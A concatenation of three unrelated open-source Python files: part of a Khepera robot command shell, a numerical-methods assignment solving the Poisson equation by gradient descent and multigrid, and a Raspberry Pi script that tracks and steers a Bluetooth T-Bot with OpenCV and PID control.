          'rvals': "New speed 2-tuple (-<motor>, -<motor>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReEnd,
            'cvt': [self.CvtFloat]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdBackward
      },

      # speed command
      'speed': {
        'help': {
          'desc': "Get Khepera's current speed.",
          'usage': "speed [incraw]",
          'args': {
            'incraw': "Include raw speed data."
          },
          'rvals': ["Current speed 2-tuple in mm/s "
                    "(<motorLeft>, <motorRight>).",
                    "If 'incraw' is specified, then include raw speed data:",
                    " (<motorLeft>, <motorRight>, <rawLeft>, <rawRight>)."]
        },
        'parse': [
          { 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
            'cvt': [self.CvtTrue]
          },
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdGetSpeed
      },

      # moveto command
      'moveto': {
        'help': {
          'desc': "Move Khepera to the given odometer positions.",
          'usage': "moveto <posLeft> <posRight>",
          'args': {
            '<posLeft>': "Target left motor position in mm [0.0, 671088.0]",
            '<posRight>': "Target right motor position in mm [0.0, 671088.0]"
          },
          'rvals': "Target odometer positions (<posLeft>, <posRight>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReArgFloat +
                     Shell.ReEnd,
            'cvt': [self.CvtFloat]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdMoveToPos
      },

      # setodometry command
      'setodometry': {
        'help': {
          'desc': "Set Khepera odometry.",
          'usage': "setodometry <posLeft> <posRight>",
          'args': {
            '<posLeft>': "Left motor position in mm [0.0, 343597384.0]",
            '<posRight>': "Right motor position in mm [0.0, 343597384.0]"
          },
          'rvals': "New odometer positions (<posLeft>, <posRight>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReArgFloat +
                     Shell.ReEnd,
            'cvt': [self.CvtFloat]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdSetOdometry
      },

      # odometry command
      'odometry': {
        'help': {
          'desc': "Get Khepera's odometry.",
          'usage': "odometry [incraw]",
          'args': {
            'incraw': "Include raw odometry data."
          },
          'rvals': ["Current odometry 2-tuple in mm (<posLeft>, <posRight>).",
                    "If 'incraw' is specified, then include raw odometry data:",
                    " (<posLeft>, <posRight>, <rawLeft>, <rawRight>)."]
        },
        'parse': [
          { 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
            'cvt': [self.CvtTrue]
          },
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdGetOdometry
      },

      # proximity command
      'proximity': {
        'help': {
          'desc': "Read Khepera proximity IR LED sensors.",
          'usage': "proximity [incraw]",
          'args': {
            'incraw': "Include raw proximity data."
          },
          'rvals': "Dictionary of read proximity sensors calibrated distances "
                   "in mm. If 'incraw' is specified, each sensor value is a "
                   "2-tuple (<mm>, <raw>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
            'cvt': [self.CvtTrue]
          },
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdReadProximitySensors
      },

      # ambient command
      'ambient': {
        'help': {
          'desc': "Read Khepera ambient IR LED sensors.",
          'usage': "ambient [incraw]",
          'args': {
            'incraw': "Include raw ambient data."
          },
          'rvals': "Dictionary of read ambient sensors calibrated distances "
                   "in mm. If 'incraw' is specified, each sensor value is a "
                   "2-tuple (<mm>, <raw>)."
        },
        'parse': [
          { 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
            'cvt': [self.CvtTrue]
          },
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdReadAmbientSensors
      },

      # calproximity command
      'calproximity': {
        'help': {
          'desc': "Get proximity sensors' calibration parameters.",
          'usage': "calproximity",
          'rvals': "Proximity calibration data."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [],
        'exec': self.CmdGetCalProximity
      },

      # calambient command
      'calambient': {
        'help': {
          'desc': "Get ambient sensors' calibration parameters.",
          'usage': "calambient",
          'rvals': "Ambient calibration data."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReEnd,
            'cvt': []
          }
        ],
        'prereq': [],
        'exec': self.CmdGetCalAmbient
      },

      # adc command
      'adc': {
        'help': {
          'desc': "Read the Analog to Digital Converter channel.",
          'usage': "adc <channel>",
          'args': {
            '<channel>': "Channel number [0, 5]."
          },
          'rvals': "ADC value."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReEnd,
            'cvt': [self.CvtInt]
          }
        ],
        'prereq': [],
        'exec': self.CmdReadAdc
      },

      # led command
      'led': {
        'help': {
          'desc': "Set Khepera user LED state.",
          'usage': "led <led_num> <state>",
          'args': {
            '<led_num>': "User LED number [0, 1].",
            '<state>': "LED state. One of: on off.",
          },
          'rvals': "New LED state."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReArgOnOff +
                     Shell.ReEnd,
            'cvt': [self.CvtInt, self.CvtOnOff]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdSetBaseLedState
      },

      # extbusread command
      'extbusread': {
        'help': {
          'desc': "Read a byte from the Khepera extension bus at the given "
                  "bus address.",
          'usage': "extbusread <addr>",
          'args': {
            '<addr>': "Bus address [0, 63]."
          },
          'rvals': "Read byte value."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReEnd,
            'cvt': [self.CvtInt]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdExtBusRead
      },

      # extbuswrite command
      'extbuswrite': {
        'help': {
          'desc': "Write a byte to the Khepera extension bus at the given "
                  "bus address.",
          'usage': "extbuswrite <addr> <byte>",
          'args': {
            '<addr>': "Bus address [0, 63].",
            '<byte>': "Byte value."
          },
          'rvals': "Written byte value."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReArgPosInt +
                     Shell.ReEnd,
            'cvt': [self.CvtInt]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdExtBusWrite
      },

      # turret command
      'turret': {
        'help': {
          'desc': "Write a command to a Khepera turret.",
          'usage': "turret <tid> <tcmd>",
          'args': {
            '<tid>': "Turret id [0, 31].",
            '<tcmd>': "Turret specific command string."
          },
          'rvals': "Turret command specific response string."
        },
        'parse': [
          { 'refmt': Shell.ReStart + Shell.ReArgPosInt + Shell.ReArgStr +
                     Shell.ReEnd,
            'cvt': [self.CvtInt, self.CvtStr]
          }
        ],
        'prereq': [self.PreReqOpen],
        'exec': self.CmdTurret
      }
    }

    # now add the additional commands to the dictionary
    self.AddToCmdDict(cmds)

  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  # Shell Commands
  #   All commands must return the 2-tuple (rc, rval) where:
  #     ('err', <errstr>) or ('ok', <data)>)
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  #--
  def _ChkRsp(self, rsp):
    """ Convert a robot command response into a shell result 2-tuple.

        All robot command wrappers return None on failure; this helper maps
        that convention onto the shell's result format.

        Parameters:
          rsp  - robot command response value, or None on error

        Return Value:
          ('err', <errstr>) if rsp is None, else ('ok', rsp).
    """
    if rsp is None:
      return 'err', self.mRobotCmds.GetErrStr()
    return 'ok', rsp

  #--
  def CmdGetVersion(self):
    """ Get Khepera Version Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdGetVersion())

  #--
  def CmdGetSpeed(self, incraw=False):
    """ Get Khepera Speed Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdGetSpeed(incraw=incraw))

  #--
  def CmdSetSpeed(self, motorLeft, motorRight):
    """ Set Khepera Speed Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdSetSpeed(motorLeft, motorRight))

  #--
  def CmdStop(self):
    """ Stop the Khepera Motion Shell Command. """
    return self.CmdSetSpeed(0, 0)

  #--
  def CmdForward(self, motor):
    """ Move the Khepera Forward Shell Command. """
    # forward motion is always a non-negative speed
    motor = abs(motor)
    return self.CmdSetSpeed(motor, motor)

  #--
  def CmdBackward(self, motor):
    """ Move the Khepera Backward Shell Command. """
    # backward motion is always a non-positive speed
    motor = abs(motor)
    return self.CmdSetSpeed(-motor, -motor)

  #--
  def CmdMoveToPos(self, posLeft, posRight):
    """ Move Khepera to Position Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdMoveToPos(posLeft, posRight))

  #--
  def CmdSetOdometry(self, odometerLeft, odometerRight, incraw=False):
    """ Set Khepera Odometry Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdSetOdometry(odometerLeft,
                                                       odometerRight,
                                                       incraw=incraw))

  #--
  def CmdGetOdometry(self, incraw=False):
    """ Get Khepera Odometry Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdGetOdometry(incraw=incraw))

  #--
  def CmdReadAdc(self, channel):
    """ Read Khepera ADC Channel Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdReadAdc(channel))

  #--
  def CmdSetBaseLedState(self, led, state):
    """ Set Khepera Base User LED State Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdSetBaseLedState(led, state))

  #--
  def CmdReadProximitySensors(self, incraw=False):
    """ Get Khepera Proximity IR LED Sensors Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdReadProximitySensors(incraw=incraw))

  #--
  def CmdReadAmbientSensors(self, incraw=False):
    """ Get Khepera Ambient IR LED Sensors Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdReadAmbientSensors(incraw=incraw))

  #--
  def CmdGetCalProximity(self):
    """ Get proximity sensors' calibration parameters Shell Command. """
    # calibration reads cannot fail, so no error check is needed
    cal = self.mRobotCmds.ProximitySensorsGetCalParams()
    return 'ok', cal

  #--
  def CmdGetCalAmbient(self):
    """ Get ambient sensors' calibration parameters Shell Command. """
    # calibration reads cannot fail, so no error check is needed
    cal = self.mRobotCmds.AmbientSensorsGetCalParams()
    return 'ok', cal

  #--
  def CmdExtBusRead(self, addr):
    """ Read from the Khepera Extension Bus Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdExtBusRead(addr))

  #--
  def CmdExtBusWrite(self, addr, byte):
    """ Write to the Khepera Extension Bus Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdExtBusWrite(addr, byte))

  #--
  def CmdTurret(self, tid, tcmd):
    """ Write a Shell Command to a Khepera Turret Shell Command. """
    return self._ChkRsp(self.mRobotCmds.CmdTurret(tid, tcmd))

  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  # Parameter Converters
  #   All converters must return the 2-tuple (rc, rval) where:
  #     ('err', <errstr>) or ('ok', <data)>)
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  # Common Shell Prerequisites
  #   All prerequisite checkers must return either True (ok) or False.
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  # Response Post-Processors
  #   All response post-processors must print any formatted data to fout.
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  # Shell Callback Overrides
  # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#-------------------------------------------------------------------------------
# Main
#-------------------------------------------------------------------------------
#--
# Launch the interactive Khepera base shell; exit with the shell's status.
if __name__ == "__main__":
  import sys
  sys.exit( KheRawShell.main(shclass=KheBaseShell,
                             argv0=__file__,
                             shName='Khepera Base') )
|
<reponame>liuzhengqi1996/math452_Spring2022<gh_stars>0
#!/usr/bin/env python
# coding: utf-8
# # Week 5 Programming Assignment
#
# Remark:
#
# Please upload your solutions of this assignment to Canvas with a file named "Programming_Assignment_5 _yourname.ipynb" before deadline.
# =================================================================================================================
# ## Problem 1 : Use stochastic gradient descent method to train CIFAR10 with ResNet18.
#
# Apply the following two different learning rate schedules respectively
#
# (1) run 120 epochs with a fixed learning rate 0.1,
#
# (2) run 120 epochs, and divide the learning rate by 10 every 30 epochs, which can achieve 94% test accuracy.
#
# and print the results with the following format:
#
# "Epoch: i, Learning rate: lr$_i$, Training accuracy: $a_i$, Test accuracy: $b_i$"
#
# where $i=1,2,3,...$ means the $i$-th epoch, $a_i$ and $b_i$ are the training accuracy and test accuracy computed at the end of $i$-th epoch, and lr$_i$ is the learning rate of $i$-th epoch.
#
# Optional Problem: Try to find some other learning rate schedules to achieve $94$% or higher test accuracy with less epochs.
# In[1]:
# Write your code to solve Problem 1.
# =================================================================================================================
# ## Problem 2 : Consider the Poisson equation
# \begin{equation}\label{1Dposi}
# \left\{
# \begin{aligned}
# -u''&= f, \,\, 0<x<1, \\
# u(0)&=u(1)=0.
# \end{aligned}
# \right.
# \end{equation}
#
# Assume $f(x)=1$, then the exact solution is $u(x)=\frac{1}{2}x(1-x)$. Given the partition with the grid points
# $x_i=\frac{i}{n+1}, i=0,1,\cdots,n+1$, then by finite element discretization,
# we obtain
#
# \begin{equation}\label{matrix}
# A\ast \mu =b,~~ A=\frac{1}{h}[-1,2,-1].
# \end{equation}
#
# Use gradient descent method to solve the above problem with random initial guess $\mu^0$:
#
# $$
# \mu^{m} = \mu^{m-1} - \eta ( A* \mu^{m-1}- b),~~ m=1,2,3,...,M
# $$
#
# Set $n=15$ and $M=10$.
#
# (1) Plot the curves of $u$ and $\mu^{M}$.
#
# (2) Compute the error of the residual by $e^m = \sqrt{\sum_{i=0}^{n+1}|(A* \mu^{m}- b)_i |^2},~~ m=1,2,3,...,M$ and the index $i$ means the $i$-th entry of the vector. Plot a curve, where x-axis is $m=1,2,3,...,M$ and y-axis is $e^m$.
#
# (3) Find the minimum $M$ such that $e^M = \sqrt{\sum_{i=0}^{n+1}|(A* \mu^{M}- b)_i |^2}<10^{-4}$ and record the computational time cost.
# In[2]:
import numpy as np
import time
import matplotlib.pyplot as plt
######## FEM_GD ########
def _apply_A(u, h):
    """Apply the 1-D Poisson FEM stencil A = [-1, 2, -1]/h to u.

    The Dirichlet boundary values u(0) = u(1) = 0 are not stored, so the
    first and last rows of A only touch two of the stored entries.

    Args:
        u (np.ndarray): values at the n inner grid points.
        h (float): grid spacing.

    Returns:
        np.ndarray: A*u, same length as u.
    """
    A = np.array([-1.0, 2.0, -1.0]) / h
    Au = np.empty_like(u, dtype=float)
    Au[0] = A[1] * u[0] + A[2] * u[1]
    for j in range(1, len(u) - 1):
        Au[j] = np.dot(u[j - 1:j + 2], A)
    Au[-1] = A[0] * u[-2] + A[1] * u[-1]
    return Au


def FEM_GD(u, b, h):
    """Perform one gradient-descent iteration for the FEM system A*u = b.

    Uses the fixed step size eta = h/4, the same damped-Jacobi step used by
    the multigrid smoother in Problem 3:  u <- u + (h/4) * (b - A*u).

    Args:
        u (np.ndarray): current iterate at the n inner grid points.
        b (np.ndarray): right-hand-side vector (same length as u).
        h (float): grid spacing.

    Returns:
        np.ndarray: the next iterate (a new array; u is not modified).
    """
    return u + 0.25 * h * (b - _apply_A(u, h))


def _run_problem2():
    """Solve Problem 2: run M gradient-descent iterations and plot results."""
    ######## parameter definition ########
    J = 4                                   # grid level
    n = 2**J - 1                            # number of inner grid points
    h = 1 / 2**J                            # length of grid interval
    x = np.arange(1, n + 1) * h             # grid points
    u = 1/2 * x * (1 - x)                   # true solution at grid points
    b = np.ones(n) * h                      # right-hand-side term
    u1 = (np.random.rand(n)*2 - 1 + np.sin(4*np.pi*x)) / 2  # initial value for u
    M = 10
    t0 = time.time()                        # initial time
    ######## compute numerical solution ########
    err = []                                # error of each iteration
    for m in range(M):
        u1 = FEM_GD(u1, b, h)
        # residual norm e^m = ||A*u^m - b||_2 of the m-th iteration
        err.append(np.linalg.norm(_apply_A(u1, h) - b))
    print('time cost', time.time() - t0)
    ######## plot the exact solution and numerical solution ########
    plt.figure()
    plt.title('Exact solution and numerical solution')
    plt.plot(x, u, label='Exact solution')
    plt.plot(x, u1, '*', label='Numerical solution')
    plt.legend()
    plt.show()
    ######## plot the l2 norm of the error vs iterations ########
    plt.figure()
    plt.title('Error vs number of iterations using FEM and gradient descent')
    plt.plot(err)
    plt.xlabel('Number of iterations')
    plt.yscale('log')
    plt.ylabel('Error')
    plt.show()


if __name__ == '__main__':
    _run_problem2()
# =================================================================================================================
# ## Problem 3 : Consider the Poisson equation described in Problem 2, call the Multigrid code given in the following cell to obtain a solution $u^{\nu}$.
# Use multigrid method to solve the above problem with random initial guess $\mu^0$:
#
# $$
# \mu^{m} = MG1(\mu^{m-1}),~~ m=1,2,3,...,M
# $$
#
# Set $n=15$ and $M=10$.
#
# (1) Plot the curves of $u$ and $\mu^{M}$ and record the computational time cost.
#
# (2) Compute the error of the residual by $e^m = \sqrt{\sum_{i=0}^{n+1}|(A* \mu^{m}- b)_i |^2},~~ m=1,2,3,...,M$ and the index $i$ means the $i$-th entry of the vector. Plot a curve, where x-axis is $m=1,2,3,...,M$ and y-axis is $e^m$.
# In[3]:
import numpy as np
import time
import matplotlib.pyplot as plt
######## MG1 definition ########
def MG1(b, u0, J, v):  # \mu=[\mu_1,\mu_2,\mu_3,...,\mu_J]
    """Perform one multigrid V-cycle for the 1-D Poisson system A*u = b.

    Level l = 1 is the finest grid (spacing 1/2**J); each coarser level
    halves the number of inner points. On each level a damped-Jacobi
    smoother (step h_l/4) is applied v[l-1] times, the residual is
    restricted with the full-weighting stencil R = [1/2, 1, 1/2], and the
    coarse correction is prolonged back with the matching interpolation.

    Args:
        b (np.ndarray): fine-grid right-hand side, length 2**J - 1.
        u0 (np.ndarray): fine-grid initial guess (updated in place).
        J (int): number of grid levels; the coarsest level has 1 unknown.
        v (sequence of int): smoothing sweeps per level, len(v) == J.

    Returns:
        np.ndarray: the updated fine-grid iterate (the same object as u0).
    """
    if len(b) != len(u0):
        print('input size not equal')
    if len(v) != J:
        print('length of v not equal to J')
    B = [0, b]              # B[l] is the right-hand side on level l (index 0 unused)
    U = [0, u0]             # U[l] is the iterate on level l (index 0 unused)
    R = np.array([1/2, 1, 1/2])  # restriction / prolongation stencil
    # ---- downward sweep: smooth, then restrict the residual ----
    for l in np.arange(1, J + 1):
        h_l = 1 / 2**(J + 1 - l)
        # BUGFIX: original was np.array([-1, 2, -1] / h_l), which divides a
        # plain Python list by a float and raises TypeError.
        A = np.array([-1, 2, -1]) / h_l
        if l < J:
            for i in np.arange(0, v[l-1]):
                # apply the tridiagonal stencil to U[l]
                temp = np.array([U[l][0]*A[1] + U[l][1]*A[2]])
                for j in np.arange(1, len(U[l]) - 1):
                    temp = np.append(temp, np.dot(U[l][j-1:j+2], A))
                temp = np.append(temp, U[l][-2]*A[0] + U[l][-1]*A[1])
                U[l] += 1/4*h_l*(B[l] - temp)   # damped-Jacobi update
            # zero initial guess on the next (coarser) level
            U.append(np.zeros((len(U[l]) - 1)//2))
            # restrict the smoothed residual to form the coarse RHS
            newb = []
            temp = np.array([U[l][0]*A[1] + U[l][1]*A[2]])
            for j in np.arange(1, len(U[l]) - 1):
                temp = np.append(temp, np.dot(U[l][j-1:j+2], A))
            temp = np.append(temp, U[l][-2]*A[0] + U[l][-1]*A[1])
            for k in range((len(U[l]) - 1)//2):
                newb.append(np.dot((B[l] - temp)[2*k:2*k+3], R))
            B.append(newb)
        else:
            # coarsest level holds a single unknown, so A*u = A[1]*u[0]
            for i in np.arange(0, v[l-1]):
                temp = np.array(U[l][0]*A[1])
                U[l] += 1/4*h_l*(B[l] - temp)
    # ---- upward sweep: prolong the correction and add it in ----
    for l in np.arange(J-1, 0, -1):
        temp = [1/2*U[l+1][0]]
        for i in np.arange(1, len(U[l+1])*2):
            if i % 2 == 1:
                temp.append(U[l+1][(i-1)//2])
            else:
                temp.append(1/2*(U[l+1][(i-2)//2] + U[l+1][i//2]))
        temp.append(1/2*U[l+1][-1])
        U[l] += temp
    return U[1]
######## parameter definition ########
J = 4                           # grid level
n = 2**J - 1                    # number of inner grid points
h = 1 / 2**J                    # length of grid interval
x = np.arange(1, n + 1) * h     # grid points
u = 1/2*x*(1-x)                 # true solution at grid points
b = np.ones(n)*h                # right-hand-side term
u1 = np.random.rand(n)*2 - 1    # initial value for u
M = 10
t0 = time.time()
######## compute numerical solution ########
err = []                        # error of each iteration
v = [3] * J                     # smoothing sweeps per level for the V-cycle
A = np.array([-1, 2, -1]) / h   # fine-grid stencil, used only for the residual
for m in range(M):
    u1 = MG1(b, u1, J, v)       # one V-cycle: mu^m = MG1(mu^{m-1})
    # residual e^m = ||A*mu^m - b||_2 via the tridiagonal stencil
    temp = np.array([u1[0]*A[1] + u1[1]*A[2]])
    for j in np.arange(1, len(u1) - 1):
        temp = np.append(temp, np.dot(u1[j-1:j+2], A))
    Au = np.append(temp, u1[-2]*A[0] + u1[-1]*A[1])
    err.append(np.linalg.norm(Au - b))
print('time cost', time.time() - t0)
######## plot the exact solution and numerical solution ########
plt.figure()
plt.title('Exact solution and numerical solution')
plot = plt.plot(x, u, label='Exact solution')
plot = plt.plot(x, u1, '*', label='Numerical solution')
plt.legend()
plt.show()
######## plot the l2 norm of the error vs iterations ########
plt.figure()
plt.title('Error vs number of iterations using multigrid')
plot = plt.plot(err)
plt.xlabel('Number of iterations')
plt.yscale('log')
plt.ylabel('Error')
plt.show()
# =================================================================================================================
|
<gh_stars>10-100
import sys
import cv2
import os
import imutils
sys.path.append('/home/pi/GitHub/T-BOTS/Python')
from collections import deque
import numpy as np
import matplotlib.pyplot as plt
from TBotTools import tbt, pid, geometry
from time import time
plt.ion()
import bluetooth as bt
from datetime import datetime
import pygame
from pygame.locals import *
from sys import exit
# ---------------- Path / display configuration ---------------- #
scalefactor = 1      # scale applied to loaded path coordinates
#origin = [636/2,357/2]
origin = [0,0]       # pixel offset added to the loaded path
showline = 0         # 1 -> draw the target path on each frame
########################################################################
#----------------------- Draw ----------------------------#
########################################################################
filename = 'pathpoints.dat'
if os.path.isfile(filename):
    # Load the recorded path and transform it into screen coordinates.
    aa = np.loadtxt(filename)
    aa[:,0] = aa[:,0]*scalefactor+origin[0]
    aa[:,1] = aa[:,1]*scalefactor+origin[1]
    coordinate = list(tuple(map(tuple,aa.astype(int))))
else:
    coordinate = []
# Grab a single frame to use as the pygame background image.
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 1)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)
success, frame = cap.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.release()
pygame.init()
screen = pygame.display.set_mode((633, 359), 0, 0)
canvas = pygame.image.frombuffer(frame.tostring(),frame.shape[1::-1],'RGB')
# Tracking state and lap-timing bookkeeping.
x = []
y = []
x2 = []
y2 = []
starttime = []
endtime = []
laptime = 1000       # sentinel "no lap completed yet" value
oldlaptime = 500
folder = 'RecordedImages/'
record = 0           # 1 -> save every 5th frame to disk
# NOTE(review): frame saving below uses a `template` filename pattern that
# is never defined in this file - enabling `record` would raise NameError.
font = cv2.FONT_HERSHEY_SIMPLEX
#---------------- Setup text writing -----------------#
# org
org = (50, 50)
# fontScale
fontScale = 0.5
# Blue color in BGR
color = (255, 0, 0)
color2 = (255, 255, 255)
# Line thickness in px
thickness = 1
textstr = ''
tii = 0 # counter to prevent recording every frame and slowing the Pi
iii = 1
loopcount = 0
pathindex = 0        # index of the current target waypoint in `aa`
timeflag = 0         # 1 once the lap timer has been started
pathindex = 0
rotspeed = 200       # 200 is the neutral value in the 3-digit protocol
speedfactor = 0.3
turnspeedfactor = 0.3
turntime = 0.005
bendscalefactor = 10
rdeadban = 2         # presumably a rotational dead-band -- TODO confirm
tolerance = 30       # pixel distance at which a waypoint counts as reached
feedforward = 0
# PID controllers: position -> forward speed, heading -> turn speed.
pos_pid = pid.pid(0.2,0.4,0,[-10,10],[0,40],turntime)
angle_pid = pid.pid(0.4,2.40,0.01,[-15,15],[-60,60],turntime)
#----------------------------------------------------------------------#
# Set HSV Thresholds
#
# Artificial Lighting
#----------------------------------------------------------------------#
greenLower = (36,42,228)
greenUpper = (74,255,255)
pinkLower = (143,70,113)
pinkUpper = (255,255,255)
#----------------------------------------------------------------------#
# Sunny
#----------------------------------------------------------------------#
#greenLower = (74,105,61)
#greenUpper = (90,255,224)
#pinkLower = (127,53,58)
#pinkUpper = (255,255,255)
#----------------------------------------------------------------------#
#----------------------------------------------------------------------#
# Dull
#----------------------------------------------------------------------#
#greenLower = (41,43,213)
#greenUpper = (66,255,224)
#pinkLower = (140,77,98)
#pinkUpper = (255,255,255)
#----------------------------------------------------------------------#
# sets the length of the trail
pts = deque(maxlen=10)
pts2 = deque(maxlen=10)
# NOTE(review): the following constants re-assign the same values already
# set earlier in this file; the duplication looks unintended but is harmless.
pathindex = 0
rotspeed = 200
speedfactor = 0.3
turnspeedfactor = 0.3
turntime = 0.005
bendscalefactor = 10
rdeadban = 2
tolerance = 30
#-------------------- Define functions ------------------------------#
geom = geometry.geometry(1) # scale factor to convert pixels to mm
#--------------------- Setup Bluetooth --------------------------------#
data = [0,0,0,0]
sendcount = 0
#------------------------------------------------------------------
# For Linux / Raspberry Pi
#------------------------------------------------------------------
bd_addr = '98:D3:51:FD:81:AC' # use: 'hcitool scan' to scan for your T-Bot address
#bd_addr = '98:D3:51:FD:82:95' # George
#bd_addr = '98:D3:91:FD:46:C9' # B
#bd_addr = '98:D3:32:21:3D:77'
port = 1
btcom = tbt.bt_connect(bd_addr,port,'PyBluez') # PyBluez works well for the Raspberry Pi
#btcom = tbt.bt_connect(bd_addr,port,'Socket')
#----------------------------------------------------------------------#
# For Windows and Mac
#----------------------------------------------------------------------#
#port = 'COM5'
#port = '/dev/tty.George-DevB'
#baudrate = 38400
#bd_addr = 'Empty'
#btcom = tbt.bt_connect(bd_addr,port,'PySerial',baudrate)
#----------------- Generate target function -------------------------#
amplitude = 80
frequency = 1
phase = 0
stepsize = 5
border = 80 # sets the number of pixels from the edge which wont be occupied by the function.
bg = frame.shape[0]/2 # this is the background of the sin function
#---------- Create mask for coordinates ------------#
xdata = np.arange(border, frame.shape[1]-border, stepsize)
# NOTE(review): this reload overwrites the scaled/offset path computed at the
# top of the file (scalefactor/origin are not applied here) - confirm intended.
aa = np.loadtxt('pathpoints.dat') # Use Click2Path.py to create an arbitrary path
########################################################################
#----------------------- Start main loop ----------------------------#
########################################################################
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 720)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 405)
oldtime = time()
if __name__ == '__main__':
    # NOTE(review): the source this was recovered from had flattened
    # indentation; the nesting below was reconstructed from the control
    # flow and should be confirmed against the original script.
    success, frame = cap.read()
    if not success:
        print('Failed to capture video')
        sys.exit(1)
    #####################################################
    #----------------- Track T-Bot -------------------#
    #####################################################
    while cap.isOpened():
        success, frame = cap.read()
        #frame = cv2.flip(frame,1)
        if not success:
            break
        # NOTE(review): `~` is bitwise NOT, so ~True == -2 and ~False == -1
        # are both truthy - this branch is entered every frame regardless of
        # the connection state; `not btcom.connected()` was probably intended.
        if ~btcom.connected():
            tries = 0
            while btcom.connected() < 1 and tries < 10:
                print('Connecting ...')
                try:
                    print('Try '+str(tries+1)+' of 10')
                    btcom.connect(0)
                    btcom.connect(1)
                    tries+=1
                except:
                    # bare except: swallow any connect error and retry
                    print('Something went wrong')
            if btcom.connected() < 1:
                print('Exiting Program')
                sys.exit()
            else:
                tries = 0
        data = btcom.get_data(data)
        blurred = cv2.GaussianBlur(frame, (11, 11), 0)
        hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV) # do this outside function so it is not done twice
        # Track the green marker; draw it and extend its trail.
        try:
            x, y, center, radius, M, cents = geom.tracker(hsv, greenLower, greenUpper)
            if radius > 1:
                cv2.circle(frame, (int(x), int(y)), int(radius),(0, 255, 0), 2)
                cv2.circle(frame, center, 2, (0, 255, 0), -1)
                pts.appendleft(center)
        except:
            pass
        # Track the pink marker; draw it and extend its trail.
        try:
            x2, y2, center2, radius2, M2, cents2 = geom.tracker(hsv, pinkLower, pinkUpper)
            if radius2 > 1:
                cv2.circle(frame, (int(x2), int(y2)), int(radius2),(113,212,198), 2)
                cv2.circle(frame, center2, 2, (113,212,198), -1)
                pts2.appendleft(center2)
        except:
            pass
        #------------- Plot trail overlay -------------#
        for i in range(1, len(pts)):
            # if either of the tracked points are None, ignore
            if pts[i - 1] is None or pts[i] is None:
                continue
            cv2.line(frame, pts[i - 1], pts[i], (0, 255, 0), 1)
        for ii in range(1, len(pts2)):
            # if either of the tracked points are None, ignore
            if pts2[ii - 1] is None or pts2[ii] is None:
                continue
            cv2.line(frame, pts2[ii - 1], pts2[ii], (113,212,198), 1)
        if showline:
            # Draw the full target path and highlight the current waypoint.
            cv2.polylines(frame, np.int32([aa]),True, (255,0,255),2)
            cv2.circle(frame, tuple(aa[pathindex,:].astype(int)), 8, (250,150,10), -1)
        # Lap-time bookkeeping and on-screen text.
        if laptime < oldlaptime:
            if laptime < 1000:
